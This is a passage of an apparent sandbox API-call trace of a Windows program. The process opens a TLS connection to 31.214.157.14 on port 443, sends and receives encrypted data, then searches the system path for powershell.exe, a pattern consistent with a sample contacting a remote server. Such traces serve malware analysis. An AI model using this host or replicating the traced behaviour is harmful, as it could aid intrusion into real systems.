[108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x5f6eb48*=0xa5c) returned 0x0
	[0191.242] LocalFree (hMem=0x6404f0) returned 0x0
	[0191.242] GetLastError () returned 0x0
	[0191.270] WSAConnect (in: s=0x4e0, name=0x2b23458*(sa_family=2, sin_port=0x1bb, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0191.295] GetLastError () returned 0x0
	[0191.296] closesocket (s=0x4dc) returned 0
	[0191.296] GetLastError () returned 0x0
	[0191.432] EnumerateSecurityPackagesW (in: pcPackages=0x5f6eaf0, ppPackageInfo=0x5f6ea60 | out: pcPackages=0x5f6eaf0, ppPackageInfo=0x5f6ea60) returned 0x0
	[0191.432] GetLastError () returned 0x0
	[0191.436] lstrlenW (lpString="Negotiate") returned 9
	[0191.437] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f000, Length=0x14 | out: Destination=0x628ea0) 
	[0191.437] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0191.437] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f014, Length=0x3a | out: Destination=0x628ea0) 
	[0191.438] lstrlenW (lpString="NegoExtender") returned 12
	[0191.438] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f04e, Length=0x1a | out: Destination=0x628ea0) 
	[0191.438] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0191.438] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f068, Length=0x3c | out: Destination=0x628ea0) 
	[0191.438] lstrlenW (lpString="Kerberos") returned 8
	[0191.438] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f0a4, Length=0x12 | out: Destination=0x628ea0) 
	[0191.438] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0191.438] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f0b6, Length=0x30 | out: Destination=0x628ea0) 
	[0191.439] lstrlenW (lpString="NTLM") returned 4
	[0191.439] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f0e6, Length=0xa | out: Destination=0x628ea0) 
	[0191.439] lstrlenW (lpString="NTLM Security Package") returned 21
	[0191.439] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f0f0, Length=0x2c | out: Destination=0x628ea0) 
	[0191.439] lstrlenW (lpString="Schannel") returned 8
	[0191.439] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f11c, Length=0x12 | out: Destination=0x628ea0) 
	[0191.439] lstrlenW (lpString="Schannel Security Package") returned 25
	[0191.439] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f12e, Length=0x34 | out: Destination=0x628ea0) 
	[0191.440] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0191.440] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f162, Length=0x5a | out: Destination=0x628ea0) 
	[0191.440] lstrlenW (lpString="Schannel Security Package") returned 25
	[0191.440] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f1bc, Length=0x34 | out: Destination=0x628ea0) 
	[0191.440] lstrlenW (lpString="WDigest") returned 7
	[0191.440] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f1f0, Length=0x10 | out: Destination=0x628ea0) 
	[0191.440] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0191.440] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f200, Length=0x44 | out: Destination=0x628ea0) 
	[0191.441] lstrlenW (lpString="TSSSP") returned 5
	[0191.441] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f244, Length=0xc | out: Destination=0x628ea0) 
	[0191.441] lstrlenW (lpString="TS Service Security Package") returned 27
	[0191.441] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f250, Length=0x38 | out: Destination=0x628ea0) 
	[0191.441] lstrlenW (lpString="pku2u") returned 5
	[0191.441] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f288, Length=0xc | out: Destination=0x628ea0) 
	[0191.441] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0191.442] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f294, Length=0x2e | out: Destination=0x628ea0) 
	[0191.442] lstrlenW (lpString="CREDSSP") returned 7
	[0191.442] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f2c2, Length=0x10 | out: Destination=0x628ea0) 
	[0191.442] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0191.442] RtlMoveMemory (in: Destination=0x628ea0, Source=0x63f2d2, Length=0x48 | out: Destination=0x628ea0) 
	[0191.446] FreeContextBuffer (in: pvContextBuffer=0x63ef38 | out: pvContextBuffer=0x63ef38) returned 0x0
	[0191.446] GetLastError () returned 0x7f
	[0191.455] GetCurrentProcess () returned 0xffffffff
	[0191.455] GetLastError () returned 0x3f0
	[0191.455] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6e8b8 | out: TokenHandle=0x5f6e8b8*=0x4dc) returned 1
	[0191.455] GetLastError () returned 0x3f0
	[0191.506] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2b262bc, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x5f6e954, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x2b27b24, ptsExpiry=0x5f6e8c0 | out: phCredential=0x2b27b24, ptsExpiry=0x5f6e8c0) returned 0x0
	[0191.894] GetLastError () returned 0x0
	[0191.902] InitializeSecurityContextW (in: phCredential=0x5f6e8bc, phContext=0x0, pTargetName=0x2b0c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x2b27d54, pOutput=0x2b27cec, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e8b4 | out: phNewContext=0x2b27d54, pOutput=0x2b27cec, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e8b4) returned 0x90312
	[0191.903] GetLastError () returned 0x0
	[0191.903] FreeContextBuffer (in: pvContextBuffer=0x5c8cd0 | out: pvContextBuffer=0x5c8cd0) returned 0x0
	[0191.903] GetLastError () returned 0x0
	[0191.934] send (s=0x4e0, buf=0x2b27d68*, len=115, flags=0) returned 115
	[0191.934] GetLastError () returned 0x0
	[0191.935] recv (in: s=0x4e0, buf=0x2b27d68, len=5, flags=0 | out: buf=0x2b27d68*) returned 5
	[0191.964] GetLastError () returned 0x0
	[0191.964] recv (in: s=0x4e0, buf=0x2b27d6d, len=93, flags=0 | out: buf=0x2b27d6d*) returned 93
	[0191.964] GetLastError () returned 0x0
	[0191.966] InitializeSecurityContextW (in: phCredential=0x5f6e7fc, phContext=0x5f6e910, pTargetName=0x2b0c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2b27fb0, Reserved2=0x0, phNewContext=0x2b27d54, pOutput=0x2b27fc4, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e7f4 | out: phNewContext=0x2b27d54, pOutput=0x2b27fc4, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e7f4) returned 0x90312
	[0191.968] GetLastError () returned 0x0
	[0191.969] recv (in: s=0x4e0, buf=0x2b28054, len=5, flags=0 | out: buf=0x2b28054*) returned 5
	[0191.969] GetLastError () returned 0x0
	[0191.969] recv (in: s=0x4e0, buf=0x2b2806d, len=2549, flags=0 | out: buf=0x2b2806d*) returned 2549
	[0191.969] GetLastError () returned 0x0
	[0191.969] InitializeSecurityContextW (in: phCredential=0x5f6e744, phContext=0x5f6e858, pTargetName=0x2b0c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2b28ad8, Reserved2=0x0, phNewContext=0x2b27d54, pOutput=0x2b28aec, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e73c | out: phNewContext=0x2b27d54, pOutput=0x2b28aec, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e73c) returned 0x90312
	[0191.971] GetLastError () returned 0x0
	[0191.971] recv (in: s=0x4e0, buf=0x2b28b7c, len=5, flags=0 | out: buf=0x2b28b7c*) returned 5
	[0191.971] GetLastError () returned 0x0
	[0191.971] recv (in: s=0x4e0, buf=0x2b28b95, len=331, flags=0 | out: buf=0x2b28b95*) returned 331
	[0191.971] GetLastError () returned 0x0
	[0191.971] InitializeSecurityContextW (in: phCredential=0x5f6e68c, phContext=0x5f6e7a0, pTargetName=0x2b0c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2b28d54, Reserved2=0x0, phNewContext=0x2b27d54, pOutput=0x2b28d68, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e684 | out: phNewContext=0x2b27d54, pOutput=0x2b28d68, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e684) returned 0x90312
	[0191.973] GetLastError () returned 0x0
	[0191.973] recv (in: s=0x4e0, buf=0x2b28df8, len=5, flags=0 | out: buf=0x2b28df8*) returned 5
	[0191.973] GetLastError () returned 0x0
	[0191.973] recv (in: s=0x4e0, buf=0x2b28e11, len=4, flags=0 | out: buf=0x2b28e11*) returned 4
	[0191.973] GetLastError () returned 0x0
	[0191.973] InitializeSecurityContextW (in: phCredential=0x5f6e5d4, phContext=0x5f6e6e8, pTargetName=0x2b0c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2b28e8c, Reserved2=0x0, phNewContext=0x2b27d54, pOutput=0x2b28ea0, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e5cc | out: phNewContext=0x2b27d54, pOutput=0x2b28ea0, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e5cc) returned 0x90312
	[0192.007] GetLastError () returned 0x0
	[0192.007] FreeContextBuffer (in: pvContextBuffer=0x5d29b8 | out: pvContextBuffer=0x5d29b8) returned 0x0
	[0192.007] GetLastError () returned 0x0
	[0192.007] send (s=0x4e0, buf=0x2b28f1c*, len=134, flags=0) returned 134
	[0192.008] GetLastError () returned 0x0
	[0192.008] recv (in: s=0x4e0, buf=0x2b28f1c, len=5, flags=0 | out: buf=0x2b28f1c*) returned 5
	[0192.351] GetLastError () returned 0x0
	[0192.351] recv (in: s=0x4e0, buf=0x2b28f21, len=1, flags=0 | out: buf=0x2b28f21*) returned 1
	[0192.351] GetLastError () returned 0x0
	[0192.352] InitializeSecurityContextW (in: phCredential=0x5f6e51c, phContext=0x5f6e630, pTargetName=0x2b0c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2b2902c, Reserved2=0x0, phNewContext=0x2b27d54, pOutput=0x2b29040, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e514 | out: phNewContext=0x2b27d54, pOutput=0x2b29040, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e514) returned 0x90312
	[0192.354] GetLastError () returned 0x0
	[0192.354] recv (in: s=0x4e0, buf=0x2b290d0, len=5, flags=0 | out: buf=0x2b290d0*) returned 5
	[0192.354] GetLastError () returned 0x0
	[0192.354] recv (in: s=0x4e0, buf=0x2b290e9, len=48, flags=0 | out: buf=0x2b290e9*) returned 48
	[0192.354] GetLastError () returned 0x0
	[0192.354] InitializeSecurityContextW (in: phCredential=0x5f6e464, phContext=0x5f6e578, pTargetName=0x2b0c138, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2b29190, Reserved2=0x0, phNewContext=0x2b27d54, pOutput=0x2b291a4, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e45c | out: phNewContext=0x2b27d54, pOutput=0x2b291a4, pfContextAttr=0x2b26220, ptsExpiry=0x5f6e45c) returned 0x0
	[0192.872] GetLastError () returned 0x0
	[0192.896] QueryContextAttributesW (in: phContext=0x2b27d54, ulAttribute=0x4, pBuffer=0x2b29248 | out: pBuffer=0x2b29248) returned 0x0
	[0192.896] GetLastError () returned 0x0
	[0192.896] QueryContextAttributesW (in: phContext=0x2b27d54, ulAttribute=0x5a, pBuffer=0x2b29298 | out: pBuffer=0x2b29298) returned 0x0
	[0192.906] GetLastError () returned 0x0
	[0192.916] QueryContextAttributesW (in: phContext=0x2b27d54, ulAttribute=0x53, pBuffer=0x2b29564 | out: pBuffer=0x2b29564) returned 0x0
	[0192.932] GetLastError () returned 0x80092004
	[0192.963] CertDuplicateCRLContext (pCrlContext=0x648bc8) returned 0x648bc8
	[0192.963] GetLastError () returned 0x80092004
	[0192.967] CertDuplicateStore (hCertStore=0x5d0350) returned 0x5d0350
	[0192.967] GetLastError () returned 0x80092004
	[0192.967] CertEnumCertificatesInStore (hCertStore=0x5d0350, pPrevCertContext=0x0) returned 0x648c18
	[0192.967] GetLastError () returned 0x80092004
	[0192.968] CertDuplicateCRLContext (pCrlContext=0x648c18) returned 0x648c18
	[0192.968] GetLastError () returned 0x80092004
	[0192.970] CertEnumCertificatesInStore (hCertStore=0x5d0350, pPrevCertContext=0x648c18) returned 0x648bc8
	[0192.970] GetLastError () returned 0x80092004
	[0192.971] CertDuplicateCRLContext (pCrlContext=0x648bc8) returned 0x648bc8
	[0192.971] GetLastError () returned 0x80092004
	[0192.971] CertEnumCertificatesInStore (hCertStore=0x5d0350, pPrevCertContext=0x648bc8) returned 0x0
	[0192.971] GetLastError () returned 0x80092004
	[0192.971] CertCloseStore (hCertStore=0x5d0350, dwFlags=0x0) returned 1
	[0192.971] GetLastError () returned 0x80092004
	[0192.971] CertFreeCRLContext (pCrlContext=0x648bc8) returned 1
	[0192.971] GetLastError () returned 0x80092004
	[0192.982] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x5d03c8
	[0192.982] GetLastError () returned 0x80092004
	[0193.020] CertAddCRLLinkToStore (in: hCertStore=0x5d03c8, pCrlContext=0x648c18, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0193.036] GetLastError () returned 0x80092004
	[0193.036] CertAddCRLLinkToStore (in: hCertStore=0x5d03c8, pCrlContext=0x648bc8, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0193.036] GetLastError () returned 0x80092004
	[0193.038] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x648bc8, pTime=0x5f6e4f0, hAdditionalStore=0x5d03c8, pChainPara=0x628ee8, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x5f6e430 | out: ppChainContext=0x5f6e430) returned 1
	[0194.160] GetLastError () returned 0x80092004
	[0194.162] CertDuplicateCertificateChain (pChainContext=0x5791c0) returned 0x5791c0
	[0194.162] GetLastError () returned 0x80092004
	[0194.164] CertDuplicateCRLContext (pCrlContext=0x648bc8) returned 0x648bc8
	[0194.164] GetLastError () returned 0x80092004
	[0194.164] CertDuplicateCRLContext (pCrlContext=0x54016d0) returned 0x54016d0
	[0194.164] GetLastError () returned 0x80092004
	[0194.164] CertDuplicateCRLContext (pCrlContext=0x5401720) returned 0x5401720
	[0194.164] GetLastError () returned 0x80092004
	[0194.165] CertFreeCertificateChain (pChainContext=0x5791c0) 
	[0194.165] GetLastError () returned 0x80092004
	[0194.167] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x5791c0, pPolicyPara=0x5f6e5d8, pPolicyStatus=0x5f6e5c4 | out: pPolicyStatus=0x5f6e5c4) returned 1
	[0194.167] GetLastError () returned 0x0
	[0194.167] SetLastError (dwErrCode=0x0) 
	[0194.167] GetLastError () returned 0x0
	[0194.171] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x5791c0, pPolicyPara=0x5f6e654, pPolicyStatus=0x5f6e5e8 | out: pPolicyStatus=0x5f6e5e8) returned 1
	[0194.171] GetLastError () returned 0x0
	[0194.216] CertFreeCertificateChain (pChainContext=0x5791c0) 
	[0194.216] GetLastError () returned 0x0
	[0194.216] CertFreeCRLContext (pCrlContext=0x648bc8) returned 1
	[0194.216] GetLastError () returned 0x0
	[0194.226] EncryptMessage (in: phContext=0x2b27d54, fQOP=0x0, pMessage=0x2b2b0f0, MessageSeqNo=0x0 | out: pMessage=0x2b2b0f0) returned 0x0
	[0194.226] GetLastError () returned 0x0
	[0194.226] send (s=0x4e0, buf=0x2b2af44*, len=117, flags=0) returned 117
	[0194.233] GetLastError () returned 0x0
	[0194.238] setsockopt (s=0x4e0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0194.238] GetLastError () returned 0x0
	[0194.238] recv (in: s=0x4e0, buf=0x2b2b228, len=5, flags=0 | out: buf=0x2b2b228*) returned 5
	[0194.281] GetLastError () returned 0x0
	[0194.281] recv (in: s=0x4e0, buf=0x2b2b241, len=2112, flags=0 | out: buf=0x2b2b241*) returned 2112
	[0194.281] GetLastError () returned 0x0
	[0194.283] DecryptMessage (in: phContext=0x2b27d54, pMessage=0x2b2bb1c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b2bb1c, pfQOP=0x0) returned 0x0
	[0194.283] GetLastError () returned 0x0
	[0194.293] setsockopt (s=0x4e0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0194.293] GetLastError () returned 0x0
	[0194.294] SetEvent (hEvent=0x398) returned 1
	[0194.294] GetLastError () returned 0x0
	[0194.408] VirtualQuery (in: lpAddress=0x5f6e024, lpBuffer=0x5f6f024, dwLength=0x1c | out: lpBuffer=0x5f6f024*(BaseAddress=0x5f6e000, AllocationBase=0x55e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0194.412] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x628ea0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0194.412] GetLastError () returned 0x0
	[0194.416] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x628ea0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0194.416] GetLastError () returned 0x0
	[0194.416] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x628ea0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0194.416] GetLastError () returned 0x0
	[0194.425] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x631588 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0194.425] GetLastError () returned 0x0
	[0194.445] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.445] GetLastError () returned 0x0
	[0194.447] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.447] GetLastError () returned 0x3
	[0194.596] SetErrorMode (uMode=0x1) returned 0x1
	[0194.599] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.599] GetLastError () returned 0x3
	[0194.599] SetErrorMode (uMode=0x1) returned 0x1
	[0194.600] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.ps1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.600] GetLastError () returned 0x3
	[0194.602] SetErrorMode (uMode=0x1) returned 0x1
	[0194.603] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.603] GetLastError () returned 0x3
	[0194.603] SetErrorMode (uMode=0x1) returned 0x1
	[0194.603] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psm1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.603] GetLastError () returned 0x3
	[0194.605] SetErrorMode (uMode=0x1) returned 0x1
	[0194.606] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.606] GetLastError () returned 0x3
	[0194.606] SetErrorMode (uMode=0x1) returned 0x1
	[0194.606] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psd1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.606] GetLastError () returned 0x3
	[0194.609] SetErrorMode (uMode=0x1) returned 0x1
	[0194.609] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.609] GetLastError () returned 0x3
	[0194.609] SetErrorMode (uMode=0x1) returned 0x1
	[0194.609] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.COM", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.609] GetLastError () returned 0x3
	[0194.612] SetErrorMode (uMode=0x1) returned 0x1
	[0194.612] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.612] GetLastError () returned 0x3
	[0194.612] SetErrorMode (uMode=0x1) returned 0x1
	[0194.612] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.EXE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.613] GetLastError () returned 0x3
	[0194.615] SetErrorMode (uMode=0x1) returned 0x1
	[0194.615] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.615] GetLastError () returned 0x3
	[0194.616] SetErrorMode (uMode=0x1) returned 0x1
	[0194.616] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.BAT", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.616] GetLastError () returned 0x3
	[0194.618] SetErrorMode (uMode=0x1) returned 0x1
	[0194.618] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.618] GetLastError () returned 0x3
	[0194.619] SetErrorMode (uMode=0x1) returned 0x1
	[0194.619] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.CMD", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.619] GetLastError () returned 0x3
	[0194.621] SetErrorMode (uMode=0x1) returned 0x1
	[0194.621] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.621] GetLastError () returned 0x3
	[0194.622] SetErrorMode (uMode=0x1) returned 0x1
	[0194.622] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBS", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.622] GetLastError () returned 0x3
	[0194.624] SetErrorMode (uMode=0x1) returned 0x1
